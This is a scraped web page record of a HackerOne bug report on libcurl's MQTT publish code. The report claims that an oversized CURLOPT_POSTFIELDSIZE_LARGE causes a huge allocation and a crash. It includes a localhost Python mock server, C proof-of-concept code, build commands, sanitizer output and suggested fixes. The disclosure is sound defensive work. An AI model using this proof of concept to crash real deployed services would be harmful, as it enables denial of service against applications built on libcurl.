{“lastseen”:”2025-11-10T15:25:59″,”description”:”## Summary\\nAn attacker can crash or forcefully abort any application that uses libcurl’s MQTT support by setting an excessively large value for `CURLOPT_POSTFIELDSIZE_LARGE`. The MQTT publish logic (`lib\/mqtt.c::mqtt_publish`) trusts this value without validating it against the protocol’s maximum remaining length (268,435,455) and without checking for arithmetic overflow. As a result, it attempts to allocate an impossibly large buffer (several exabytes) and immediately fails with either an abort (AddressSanitizer) or a `CURLE_OUT_OF_MEMORY` error, terminating the process and causing a Denial of Service.\\n\\n## Impact\\n- **Availability:** Any service that allows untrusted input to influence `CURLOPT_POSTFIELDSIZE(_LARGE)`\u2014for example, user-controlled message lengths or proxied MQTT requests\u2014can be brought down instantly. A single malicious request is enough to trigger the crash.\\n- **Stability:** Even in non-ASan builds, the call consistently returns `CURLE_OUT_OF_MEMORY`; applications that treat this as fatal (common for MQTT producers) will shut down. When compiled with sanitizers, the process aborts on the spot due to an \\”allocation-size-too-big\\” assertion.\\n- **Scope:** No authentication or man-in-the-middle capability is required. Simply making the client construct a publish request with a massive length triggers the bug.\\n\\n## Attack Scenario\\n1. The attacker convinces a libcurl-based MQTT client or gateway to publish a message whose size field is set to ~4 exabytes (or any value over 0x0FFFFFFF).\\n2. The client calls `curl_easy_setopt(handle, CURLOPT_POSTFIELDSIZE_LARGE, huge_value)` and eventually invokes `curl_easy_perform()`.\\n3. Inside `mqtt_publish`, libcurl calculates the MQTT remaining length as `payloadlen + topiclen + 2`, which wraps or exceeds the MQTT specification limit. It then calls `malloc(remaininglength + 1 + encodelen)`.\\n4. `malloc()` cannot satisfy the request and aborts (ASan) or returns NULL (if `allocator_may_return_null=1`). In either case, the application dies or enters a failure state, causing a denial of service without ever sending the payload to the broker.\\n\\n## Proof of Concept\\nTwo files are needed: a minimal MQTT mock server and a client PoC that sets an oversized payload length.\\n\\n### `mqtt_server.py`\\n“`python\\nimport socket\\n\\nHOST, PORT = \\”127.0.0.1\\”, 1883\\nCONNACK = b\\”\\\\x20\\\\x02\\\\x00\\\\x00\\”\\n\\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n s.bind((HOST, PORT))\\n s.listen(1)\\n print(f\\”[server] listening on {HOST}:{PORT}\\”)\\n conn, addr = s.accept()\\n with conn:\\n print(f\\”[server] accepted connection from {addr}\\”)\\n data = conn.recv(1024)\\n print(f\\”[server] received {len(data)} bytes\\”)\\n conn.sendall(CONNACK)\\n print(\\”[server] sent CONNACK\\”)\\n conn.recv(1024)\\n print(\\”[server] received publish (possibly truncated)\\”)\\n“`\\n\\n### `mqtt_overflow.c`\\n“`c\\n#include \\u003ccurl\/curl.h\\u003e\\n#include \\u003cstdio.h\\u003e\\n\\nint main(void)\\n{\\n CURL *curl = curl_easy_init();\\n if(!curl) {\\n fprintf(stderr, \\”curl_easy_init failed\\\\n\\”);\\n return 1;\\n }\\n\\n const char payload[] = \\”X\\”; \/* actual data: 1 byte *\/\\n const curl_off_t fake_size = ((curl_off_t)1 \\u003c\\u003c 62); \/* advertise ~4 EB *\/\\n\\n curl_easy_setopt(curl, CURLOPT_URL, \\”mqtt:\/\/127.0.0.1:1883\/topic\\”);\\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);\\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE_LARGE, fake_size);\\n curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT_MS, 2000L);\\n curl_easy_setopt(curl, CURLOPT_TIMEOUT_MS, 3000L);\\n curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);\\n\\n fprintf(stderr, \\”[*] requesting payload size: %lld\\\\n\\”, (long long)fake_size);\\n\\n CURLcode res = curl_easy_perform(curl);\\n fprintf(stderr, \\”curl_easy_perform: %d\\\\n\\”, res);\\n\\n curl_easy_cleanup(curl);\\n return (int)res;\\n}\\n“`\\n\\n### Build \\u0026 Run\\n“`bash\\n# Configure and build libcurl with MQTT enabled (example using CMake)\\ncmake -S . -B build-mqtt -DCMAKE_BUILD_TYPE=Debug -DCURL_USE_LIBPSL=OFF\\ncmake –build build-mqtt –target libcurl_shared — -j8\\n\\n# Compile PoC with AddressSanitizer\\nclang -fsanitize=address -Iinclude -Ibuild-mqtt\/lib \\\\\\n -Lbuild-mqtt\/lib -Wl,-rpath,build-mqtt\/lib \\\\\\n build-mqtt\/poc\/mqtt_overflow.c -lcurl-d -o build-mqtt\/poc\/mqtt_overflow\\n\\n# Launch mock server and execute PoC\\npython3 build-mqtt\/poc\/mqtt_server.py \\u0026\\nbuild-mqtt\/poc\/mqtt_overflow\\n“`\\n\\n### Observed Output (ASan build)\\n“`\\n[*] requesting payload size: 4611686018427387904\\n* Trying 127.0.0.1:1883…\\n* Established connection to 127.0.0.1 (127.0.0.1 port 1883) from 127.0.0.1 port 62013 \\n* Using client id ‘curlgqXILtsX’\\n==12584==ERROR: AddressSanitizer: requested allocation size 0x400000000000000c …\\nSUMMARY: AddressSanitizer: allocation-size-too-big mqtt.c:616 in mqtt_publish\\n==12584==ABORTING\\n“`\\n\\n### Observed Output (allocator may return NULL)\\n“`\\n$ ASAN_OPTIONS=allocator_may_return_null=1 build-mqtt\/poc\/mqtt_overflow\\n[*] requesting payload size: 4611686018427387904\\n==13457==WARNING: AddressSanitizer failed to allocate 0x400000000000000c bytes\\ncurl_easy_perform: 27\\n“`\\n\\nThe mock server log confirms that the connection is opened, a CONNACK is returned, and the client terminates immediately while trying to publish.\\n\\n## Root Cause\\nExcerpt from `lib\/mqtt.c`:\\n“`c\\nremaininglength = payloadlen + 2 + topiclen;\\nencodelen = mqtt_encode_len(encodedbytes, remaininglength);\\n\\npkt = malloc(remaininglength + 1 + encodelen);\\nif(!pkt) {\\n result = CURLE_OUT_OF_MEMORY;\\n goto fail;\\n}\\n…\\nmemcpy(\\u0026pkt[i], payload, payloadlen);\\n“`\\n- `payloadlen` comes directly from `CURLOPT_POSTFIELDSIZE_LARGE`.\\n- There is no check that `payloadlen` stays within the MQTT specification (maximum remaining length 0x0FFFFFFF) or within any safe memory bounds.\\n- `remaininglength + 1 + encodelen` is computed in `size_t`, so it can wrap or exceed practical memory limits.\\n- On failure, the function never reaches the publish stage, effectively crashing the client before any data is sent.\\n\\n## Recommended Mitigation\\n1. **Validate `payloadlen`:** Reject any request where `payloadlen \\u003e 0x0FFFFFFF – (topiclen + 2)` and return `CURLE_BAD_FUNCTION_ARGUMENT`.\\n2. **Overflow Guard:** Before calling `malloc`, ensure the sum `remaininglength + 1 + encodelen` cannot overflow and fits within a reasonable bound.\\n3. **Protocol Compliance:** Consider capping `mqtt_encode_len` to 4 bytes and aborting if the encoded length would exceed MQTT’s remaining length limit.\\n4. **Regression Test:** Add a unit or integration test that attempts to set an oversized `CURLOPT_POSTFIELDSIZE_LARGE` and ensures the call fails gracefully.\\n\\n## Environment\\n- macOS 15.0 (24A335)\\n- Apple Clang 17.0.0.17000319\\n- curl 8.17.1-dev (CMake build with MQTT enabled)\\n- AddressSanitizer (default settings) and libc runtime without ASan\\n\\n## Severity\\nMedium \u2014 Denial of Service via integer overflow \/ uncontrolled resource consumption (CWE-190 \/ CWE-400).\\n\\n## References\\n- MQTT Specification (v3.1.1) \u2014 Remaining Length field is limited to 268,435,455\\n- curl security program: \\u003chttps:\/\/hackerone.com\/curl\\u003e\\n\\n## Impact\\n\\n- Remote attacker can forcefully terminate any libcurl-based MQTT client or service by advertising an oversized MQTT payload.\\n- The malformed request causes libcurl to attempt an allocation of several exabytes, which immediately aborts the process (ASan) or returns CURLE_OUT_OF_MEMORY, effectively denying service.\\n- No authentication or special network position is required; a single malicious publish request suffices to crash the application.”,”published”:”2025-11-09T05:51:21″,”modified”:”2025-11-10T15:00:34″,”type”:”hackerone”,”title”:”curl: libcurl MQTT `CURLOPT_POSTFIELDSIZE_LARGE` overflow leads to immediate DoS”,”source”:””,”references”:””,”id”:”H1:3417428″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3417428″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-10T15:25:59″,”description”:”## Summary\\nAn attacker can crash or forcefully abort any application that uses libcurl’s MQTT support by setting an excessively large value for `CURLOPT_POSTFIELDSIZE_LARGE`. The MQTT…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-25414","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n